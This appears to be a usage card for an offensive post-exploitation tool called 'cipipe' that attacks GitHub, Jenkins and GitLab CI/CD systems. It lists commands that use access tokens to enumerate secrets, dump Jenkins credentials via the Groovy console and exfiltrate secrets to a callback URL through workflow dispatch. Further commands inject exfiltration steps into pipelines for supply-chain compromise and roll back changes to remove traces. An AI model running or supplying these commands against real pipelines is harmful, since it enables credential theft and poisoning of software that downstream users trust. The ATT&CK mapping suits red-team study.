cicd-attacks
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
| Field | Value |
|---|---|
| name | cicd-attacks |
| description | CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab |
| category | post-exploitation |
| tags | ["cicd","github-actions","jenkins","gitlab","pipeline","supply-chain","secret-extraction","credential-access"] |
| tech_stack | ["github","jenkins","gitlab","python","requests"] |
| cwe_ids | ["CWE-522","CWE-693","CWE-829","CWE-284"] |
| chains_with | ["T1195.002","T1552.004","T1059","T1098"] |
| prerequisites | ["T1078"] |
| version | 1.0 |
CI/CD pipeline attacks target the software delivery infrastructure to extract secrets, inject malicious code, and establish persistence. After gaining access to GitHub, Jenkins, or GitLab, these tools extract stored credentials, inject pipeline steps for secret exfiltration, and manipulate workflow configurations.
```bash
pip3 install requests

# Quick prerequisite check — GitHub
curl -s -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/user | jq .login

# Quick prerequisite check — Jenkins
curl -s -u "$JENKINS_USER:$JENKINS_TOKEN" "$JENKINS_URL/api/json" | jq .nodeDescription

# Quick prerequisite check — GitLab
curl -s -H "Private-Token: $GITLAB_TOKEN" "$GITLAB_URL/api/v4/user" | jq .username
```
| Action | Command | Purpose |
|---|---|---|
| List GitHub secrets | cipipe gh_secrets --repo OWNER/REPO --method list | Enumerate repository and environment secret names |
| Jenkins credentials | cipipe jenkins_creds --url URL --method api | List credential store entries |
| GitLab variables | cipipe gitlab_tokens --url URL --project-id ID | Enumerate CI/CD variables and tokens |
| Action | Command | Purpose |
|---|---|---|
| GitHub dispatch | cipipe gh_secrets --repo OWNER/REPO --method dispatch --callback-url URL | Exfiltrate secrets via workflow dispatch |
| Jenkins console | cipipe jenkins_creds --url URL --method console | Extract credentials via Groovy Script Console |
| GitHub logs | cipipe gh_secrets --repo OWNER/REPO --method logs | Search workflow logs for leaked secrets |
| Action | Command | Purpose |
|---|---|---|
| Inject pipeline | cipipe pipeline_inject --repo OWNER/REPO --callback-url URL | Add exfiltration step to CI/CD pipeline |
```bash
cipipe cleanup_ci
```
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| gh_secrets | GitHub Actions secret extraction | T1552.004 — Private Keys |
| jenkins_creds | Jenkins credential dump | T1555 — Credentials from Password Stores |
| pipeline_inject | CI/CD pipeline injection | T1195.002 — Compromise Software Supply Chain |
| gitlab_tokens | GitLab CI/CD variable extraction | T1552.004 — Private Keys |
| cleanup_ci | Pipeline modification rollback | T1070 — Indicator Removal |